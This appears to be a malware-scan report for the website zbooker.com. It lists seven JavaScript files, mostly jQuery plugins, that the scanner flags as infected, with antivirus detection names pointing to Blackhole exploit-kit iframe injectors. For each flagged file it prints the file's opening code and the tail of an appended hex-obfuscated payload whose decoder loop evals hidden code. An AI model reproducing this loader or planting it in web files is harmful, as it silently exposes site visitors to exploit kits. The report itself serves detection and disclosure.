Request | Server response | Status |
http://www.zbooker.com/ | 200 OK Content-Length: 301972 Content-Type: text/html | clean |
http://www.zbooker.com/js/jquery-1.6.4.js | 200 OK Content-Length: 242666 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function( window, undefined ) { var document = window.document, navigator = window.navigator, location = window.location; var jQuery = (function() { var jQuery = function( selector, context ) { return new jQuery.fn.init( selector, context, rootjQuery ); }, _jQuery = window.jQuery, _$ = window.$, rootjQuery, quickExpr = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/, rnotwhite = /\S/, trimLeft = /^\s+/, trimRigh
... 3291 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/Expack.CM.4
- Avast
- JS:Iframe-CTO [Trj]
- Ad-Aware
- Trojan.JS.Agent.JBT
- nProtect
- Trojan.JS.Agent.JBT
- TrendMicro-HouseCall
- TROJ_GEN.F47V0109
- Comodo
- TrojWare.JS.TrojanDownloader.Iframe.MAD
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.457
- Microsoft
- Trojan:JS/BlacoleRef.DK
- Kaspersky
- HEUR:Paranoid.Script.Detect
- MicroWorld-eScan
- Trojan.JS.Agent.JBT
- Fortinet
- JS/IFrame.AO!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- VIPRE
- Trojan.Js.BlacoleRef.dj (v)
- AVG
- JS/Exploit
- Norman
- Blacole.US
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|
http://www.zbooker.com/js/jcarousellite_1.0.1.js | 200 OK Content-Length: 18530 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.jCarouselLite = function(o) { o = $.extend({ btnPrev: null, btnNext: null, btnGo: null, mouseWheel: false, auto: null, speed: 200, easing: null, vertical: false, circular: true, visible: 3, start: 0, scroll: 1, beforeStart: null, afterEnd: null }, o || {}
... 3172 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/Expack.CM.4
- Avast
- JS:Iframe-CTO [Trj]
- Ad-Aware
- Trojan.JS.Agent.JBT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Agent.JBT
- TrendMicro-HouseCall
- JS_BLACOLE.SMVR
- Comodo
- TrojWare.JS.TrojanDownloader.Iframe.MAD
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- CAT-QuickHeal
- JS/Iframe.DGS
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.D
- DrWeb
- JS.IFrame.457
- TrendMicro
- JS_BLACOLE.SMVR
- Microsoft
- Trojan:JS/BlacoleRef.DK
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Agent.JBT
- Fortinet
- JS/IFrame.AO!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- F-Secure
- Trojan.JS.Agent.JBT
- VIPRE
- Trojan.Js.BlacoleRef.dj (v)
- AVG
- JS/Exploit
- Norman
- Blacole.UX
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|
http://www.zbooker.com/js/jquery.validate.js | 200 OK Content-Length: 39861 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.extend($.fn, { validate: function( options ) { if (!this.length) { options && options.debug && window.console && console.warn( "nothing selected, can't validate, returning nothing" ); return; } var validator = $.data(this[0], 'validator'); if ( validator ) { return validator; } validator = new $.validator( options, this[0] ); $.data(this[0], 'validator', vali
... 3350 bytes are skipped ...6_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} /*/0c0896*/Antivirus reports:- AntiVir
- JS/Expack.CM.4
- Avast
- JS:Iframe-CTO [Trj]
- Ad-Aware
- Trojan.JS.Agent.JBT
- Ikarus
- Virus.JS.Exploit
- nProtect
- Trojan.JS.Agent.JBT
- TrendMicro-HouseCall
- TROJ_GEN.F47V0109
- Comodo
- TrojWare.JS.TrojanDownloader.Iframe.MAD
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- CAT-QuickHeal
- JS/Iframe.DGS
- McAfee-GW-Edition
- JS/Exploit-Blacole.eu
- DrWeb
- JS.IFrame.457
- Microsoft
- Trojan:JS/BlacoleRef.DK
- Kaspersky
- HEUR:Paranoid.Script.Detect
- MicroWorld-eScan
- Trojan.JS.Agent.JBT
- Fortinet
- JS/IFrame.AO!tr
- McAfee
- JS/Exploit-Blacole.eu
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- VIPRE
- Trojan.Js.BlacoleRef.dj (v)
- AVG
- JS/Exploit
- Norman
- Blacole.UX
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|
http://www.zbooker.com/js/jquery-ui-1.8.11.custom.min.js | 200 OK Content-Length: 212653 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.11",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,
... 3055 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/Expack.CM.4
- Avast
- JS:Iframe-CTO [Trj]
- Ad-Aware
- Trojan.JS.Agent.JBT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Agent.JBT
- TrendMicro-HouseCall
- TROJ_GEN.F47V0109
- Comodo
- TrojWare.JS.TrojanDownloader.Iframe.MAD
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.457
- Microsoft
- Trojan:JS/BlacoleRef.DK
- Kaspersky
- HEUR:Paranoid.Script.Detect
- Fortinet
- JS/IFrame.AO!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- F-Secure
- Trojan.JS.Agent.JBT
- VIPRE
- Trojan.Js.BlacoleRef.dj (v)
- AVG
- JS/Exploit
- Norman
- Blacole.US
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|
http://www.zbooker.com/js/custom.functions.js | 200 OK Content-Length: 6197 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(function() { $(this).bind("contextmenu", function(e) { e.preventDefault(); }); $("#loading").dialog({ closeOnEscape: false, autoOpen: false, dialogClass: 'alert', modal: true, resizable: false }); }); var tb_pathToImage = "images/loadingAnimation.gif"; var tb_pathToDeleteIcon = "images/delet-icon.png"; function DisplayNone(id) { $("#" + id).css("display","none"); } function DisplayBlock(id) { $
... 3202 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/Expack.CM.4
- Avast
- JS:Iframe-CTO [Trj]
- Ad-Aware
- Trojan.JS.Agent.JBT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Agent.JBT
- TrendMicro-HouseCall
- JS_BLACOLE.SMVR
- Comodo
- TrojWare.JS.TrojanDownloader.Iframe.MAD
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- CAT-QuickHeal
- JS/Iframe.DGS
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.D
- DrWeb
- JS.IFrame.457
- TrendMicro
- JS_BLACOLE.SMVR
- Microsoft
- Exploit:JS/Blacole.NO
- Kaspersky
- HEUR:Paranoid.Script.Detect
- MicroWorld-eScan
- Trojan.JS.Agent.JBT
- Fortinet
- JS/IFrame.AO!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- AVG
- JS/Exploit
- Norman
- Blacole.UX
- GData
- Trojan.JS.Agent.JBT
- Symantec
- Trojan.Malscript
- BitDefender
- Trojan.JS.Agent.JBT
|
http://www.zbooker.com/js/alert/jquery.alerts.js | 200 OK Content-Length: 11920 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.alerts = { verticalOffset: -75, horizontalOffset: 0, repositionOnResize: true, overlayOpacity: .01, overlayColor: '#FFF', draggable: true, okButton: ' OK ', cancelButton: ' Cancel ', dialogClass: null, alert: function(message, title, callback) { if( title == n
... 3336 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/Expack.CM.4
- Avast
- JS:Iframe-CTO [Trj]
- Ad-Aware
- Trojan.JS.Agent.JBT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Agent.JBT
- TrendMicro-HouseCall
- JS_BLACOLE.SMVR
- Comodo
- TrojWare.JS.TrojanDownloader.Iframe.MAD
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- CAT-QuickHeal
- JS/Iframe.DGS
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- DrWeb
- JS.IFrame.457
- TrendMicro
- JS_BLACOLE.SMVR
- Microsoft
- Trojan:JS/BlacoleRef.DK
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Agent.JBT
- Fortinet
- JS/IFrame.AO!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- F-Secure
- Trojan.JS.Agent.JBT
- VIPRE
- Trojan.Js.BlacoleRef.dj (v)
- AVG
- JS/Exploit
- Norman
- Blacole.UX
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|
http://cdn.wibiya.com/Toolbars/dir_1194/Toolbar_1194950/Loader_1194950.js | 400 Bad Request Content-Length: 272 Content-Type: text/html | clean |
http://cdn.wibiya.com/test404page.js | 400 Bad Request Content-Length: 211 Content-Type: text/html | clean |
http://www.zbooker.com/js/easySlider1.7.js | 200 OK Content-Length: 10484 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.easySlider = function(options){ var defaults = { prevId: 'prevBtn', prevText: 'Previous', nextId: 'nextBtn', nextText: 'Next', controlsShow: true, controlsBefore: '', controlsAfter: '', controlsFade: true, firstId: 'firstBtn', firstText: 'First', firstShow: false, lastId: 'lastBtn', lastText: 'Last', lastShow: false, vertica
... 3358 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}Antivirus reports:- AntiVir
- JS/Expack.CM.4
- Avast
- JS:Iframe-CTO [Trj]
- Ad-Aware
- Trojan.JS.Agent.JBT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Agent.JBT
- TrendMicro-HouseCall
- JS_BLACOLE.SMVR
- Comodo
- TrojWare.JS.TrojanDownloader.Iframe.MAD
- Emsisoft
- Trojan.JS.Agent.JBT (B)
- CAT-QuickHeal
- JS/Iframe.DGS
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.D
- DrWeb
- JS.IFrame.457
- TrendMicro
- JS_BLACOLE.SMVR
- Microsoft
- Trojan:JS/BlacoleRef.DK
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Agent.JBT
- Fortinet
- JS/IFrame.AO!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.bvtkmp
- F-Secure
- Trojan.JS.Agent.JBT
- VIPRE
- Trojan.Js.BlacoleRef.dj (v)
- AVG
- JS/Exploit
- Norman
- Blacole.UX
- GData
- Trojan.JS.Agent.JBT
- BitDefender
- Trojan.JS.Agent.JBT
|